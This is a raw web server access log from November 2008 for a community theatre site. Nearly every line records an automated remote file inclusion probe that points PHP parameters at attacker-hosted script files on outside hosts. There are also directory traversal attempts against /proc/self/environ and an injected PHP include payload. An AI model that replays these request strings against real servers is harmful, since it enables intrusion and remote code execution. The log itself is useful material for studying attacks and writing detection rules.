67.19.90.90 - - [21/Nov/2008:21:21:32 -0800] "GET /logs/access.log/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
195.209.236.77 - - [21/Nov/2008:21:21:33 -0800] "GET /?sourcedir=http://oursoultvxq.com/bbs/data/bbs/ideex.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "villageplayers.org"
195.209.236.77 - - [21/Nov/2008:21:21:33 -0800] "GET /logs/?sourcedir=http://oursoultvxq.com/bbs/data/bbs/ideex.txt????? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:21:44 -0800] "GET /logs/access.log//citywriter/head.php?path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:21:44 -0800] "GET /citywriter/head.php?path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:21:44 -0800] "GET /logs//citywriter/head.php?path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:21:48 -0800] "GET /logs/access.log/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:21:48 -0800] "GET /?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:21:48 -0800] "GET /logs/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:22:37 -0800] "GET /logs/access.log//citywriter/head.php?path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:22:37 -0800] "GET /citywriter/head.php?path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:22:37 -0800] "GET /logs//citywriter/head.php?path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:22:46 -0800] "GET /logs/access.log/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:22:46 -0800] "GET /?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:22:46 -0800] "GET /logs/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:23:18 -0800] "GET /logs/access_080921.log//citywriter/head.php?path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
195.12.53.176 - - [21/Nov/2008:21:23:55 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.autofacil.info/media/idv8.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "villageplayers.org"
195.12.53.176 - - [21/Nov/2008:21:23:55 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.autofacil.info/media/idv8.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:24:08 -0800] "GET /logs/access_080921.log//citywriter/head.php?path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:24:08 -0800] "GET /citywriter/head.php?path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:24:08 -0800] "GET /logs//citywriter/head.php?path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
38.103.63.56 - - [21/Nov/2008:21:24:17 -0800] "GET /logs/access_080703.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.villageplayers.org"
212.176.205.147 - - [21/Nov/2008:21:24:46 -0800] "GET /logs/access_080921.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:24:59 -0800] "GET /logs/access.log/?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:24:59 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.0" 200 763 "-" "libwww-perl/5.50" "www.villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:25:00 -0800] "GET /logs/?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.0" 200 4926 "-" "libwww-perl/5.50" "www.villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:25:48 -0800] "GET /logs//?path%5Bdocroot%5D=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:25:48 -0800] "GET /?path%5Bdocroot%5D=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:25:48 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
84.120.252.110 - - [21/Nov/2008:21:25:57 -0800] "GET /logs/access.log//errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "villageplayers.org"
84.120.252.110 - - [21/Nov/2008:21:25:57 -0800] "GET /logs/access.log/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "villageplayers.org"
84.120.252.110 - - [21/Nov/2008:21:25:57 -0800] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "villageplayers.org"
84.120.252.110 - - [21/Nov/2008:21:25:57 -0800] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "villageplayers.org"
84.120.252.110 - - [21/Nov/2008:21:25:58 -0800] "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "villageplayers.org"
84.120.252.110 - - [21/Nov/2008:21:25:58 -0800] "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "villageplayers.org"
84.120.252.110 - - [21/Nov/2008:21:25:58 -0800] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "villageplayers.org"
84.120.252.110 - - [21/Nov/2008:21:25:58 -0800] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "villageplayers.org"
84.120.252.110 - - [21/Nov/2008:21:25:58 -0800] "GET /logs/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "villageplayers.org"
84.120.252.110 - - [21/Nov/2008:21:25:58 -0800] "GET /logs//errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "villageplayers.org"
84.120.252.110 - - [21/Nov/2008:21:25:58 -0800] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "villageplayers.org"
84.120.252.110 - - [21/Nov/2008:21:25:59 -0800] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:26:10 -0800] "GET /logs//?path%5Bdocroot%5D=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:26:10 -0800] "GET /?path%5Bdocroot%5D=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:26:10 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:26:31 -0800] "GET /logs/access.log/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:26:43 -0800] "GET /logs/access.log/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:27:04 -0800] "GET /citywriter/head.php?path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:27:04 -0800] "GET /logs//citywriter/head.php?path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:27:31 -0800] "GET /logs/access_081104.log/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:27:35 -0800] "GET /logs/access_081104.log/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
85.214.21.28 - - [21/Nov/2008:21:29:42 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
85.214.21.28 - - [21/Nov/2008:21:29:42 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
85.214.21.28 - - [21/Nov/2008:21:29:42 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
85.214.21.28 - - [21/Nov/2008:21:29:42 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
208.66.76.50 - - [21/Nov/2008:21:30:18 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "villageplayers.org"
208.66.76.50 - - [21/Nov/2008:21:30:18 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "villageplayers.org"
208.66.76.50 - - [21/Nov/2008:21:30:27 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "villageplayers.org"
208.66.76.50 - - [21/Nov/2008:21:30:28 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "villageplayers.org"
195.12.53.176 - - [21/Nov/2008:21:30:29 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/rinaputria/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
195.12.53.176 - - [21/Nov/2008:21:30:29 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/rinaputria/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
64.254.233.2 - - [21/Nov/2008:21:30:46 -0800] "GET /logs/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "villageplayers.org"
64.254.233.2 - - [21/Nov/2008:21:30:46 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "villageplayers.org"
66.34.133.35 - - [21/Nov/2008:21:31:38 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
66.34.133.35 - - [21/Nov/2008:21:31:38 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
66.34.133.35 - - [21/Nov/2008:21:31:40 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
66.34.133.35 - - [21/Nov/2008:21:31:40 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
85.214.21.28 - - [21/Nov/2008:21:31:44 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:32:25 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.fileden.com/files/2008/10/20/2152050/id6v.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "villageplayers.org"
63.247.90.202 - - [21/Nov/2008:21:33:06 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "villageplayers.org"
63.247.90.202 - - [21/Nov/2008:21:33:06 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "villageplayers.org"
63.247.90.202 - - [21/Nov/2008:21:33:08 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "villageplayers.org"
63.247.90.202 - - [21/Nov/2008:21:33:08 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "villageplayers.org"
200.201.48.198 - - [21/Nov/2008:21:33:49 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.roquetartdanse.com/smsvnid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "villageplayers.org"
38.103.63.56 - - [21/Nov/2008:21:33:53 -0800] "GET /logs/access_080630.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.villageplayers.org"
213.198.112.132 - - [21/Nov/2008:21:35:38 -0800] "GET /logs/access_081104.log/header.inc.php?sIncPath=http://bedfordfwc.com/xpl/mild.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.villageplayers.org"
213.198.112.132 - - [21/Nov/2008:21:35:38 -0800] "GET /header.inc.php?sIncPath=http://bedfordfwc.com/xpl/mild.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.villageplayers.org"
213.198.112.132 - - [21/Nov/2008:21:35:39 -0800] "GET /logs/header.inc.php?sIncPath=http://bedfordfwc.com/xpl/mild.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.villageplayers.org"
194.177.196.2 - - [21/Nov/2008:21:36:28 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "villageplayers.org"
194.177.196.2 - - [21/Nov/2008:21:36:28 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "villageplayers.org"
194.177.196.2 - - [21/Nov/2008:21:36:30 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "villageplayers.org"
194.177.196.2 - - [21/Nov/2008:21:36:30 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "villageplayers.org"
118.82.127.125 - - [21/Nov/2008:21:36:39 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.roquetartdanse.com/smsvnid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
64.254.233.2 - - [21/Nov/2008:21:38:57 -0800] "GET /logs/access_080921.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.villageplayers.org"
200.201.48.198 - - [21/Nov/2008:21:39:12 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.roquetartdanse.com/smsvnid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:39:24 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:39:24 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:39:24 -0800] "GET /logs/access_080921.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
38.103.63.56 - - [21/Nov/2008:21:39:25 -0800] "GET /logs/access_080704.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:40:13 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.0" 200 763 "-" "libwww-perl/5.50" "www.villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:40:22 -0800] "GET /logs/access_081104.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:41:06 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:41:06 -0800] "GET /logs/access_080921.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:41:06 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
80.79.115.210 - - [21/Nov/2008:21:41:18 -0800] "GET /logs/access.log/?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
80.79.115.210 - - [21/Nov/2008:21:41:19 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.villageplayers.org"
80.79.115.210 - - [21/Nov/2008:21:41:19 -0800] "GET /logs/?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.villageplayers.org"
202.123.69.25 - - [21/Nov/2008:21:41:21 -0800] "GET /logs/access_080921.log/init.php?API_HOME_DIR=http://www.geocities.com/dora2355/idperkosa.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.villageplayers.org"
202.123.69.25 - - [21/Nov/2008:21:41:21 -0800] "GET /init.php?API_HOME_DIR=http://www.geocities.com/dora2355/idperkosa.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.villageplayers.org"
202.123.69.25 - - [21/Nov/2008:21:41:21 -0800] "GET /logs/init.php?API_HOME_DIR=http://www.geocities.com/dora2355/idperkosa.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.villageplayers.org"
208.66.76.50 - - [21/Nov/2008:21:41:32 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.villageplayers.org"
211.43.211.133 - - [21/Nov/2008:21:41:44 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.wfc.edu.tw/~wwwme/bulletin/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "villageplayers.org"
211.43.211.133 - - [21/Nov/2008:21:41:44 -0800] "GET /logs/access_081105.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.wfc.edu.tw/~wwwme/bulletin/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "villageplayers.org"
211.43.211.133 - - [21/Nov/2008:21:41:44 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.wfc.edu.tw/~wwwme/bulletin/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:41:55 -0800] "GET /logs/access_081104.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
118.82.127.125 - - [21/Nov/2008:21:42:08 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.roquetartdanse.com/smsvnid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
38.103.63.56 - - [21/Nov/2008:21:42:28 -0800] "GET /logs/access_080719.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.villageplayers.org"
118.82.127.125 - - [21/Nov/2008:21:42:31 -0800] "GET /common/db.php?commonpath=http://www.luzaclub.ru/news/rissiord.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
118.82.127.125 - - [21/Nov/2008:21:43:29 -0800] "GET /common/db.php?commonpath=http://www.luzaclub.ru/news/rissiord.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:21:44:21 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:21:44:21 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:21:44:21 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:44:31 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:44:31 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
70.85.149.242 - - [21/Nov/2008:21:44:35 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "villageplayers.org"
70.85.149.242 - - [21/Nov/2008:21:44:35 -0800] "GET /galeria.php?start=0&kategoria=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "villageplayers.org"
70.85.149.242 - - [21/Nov/2008:21:44:39 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "villageplayers.org"
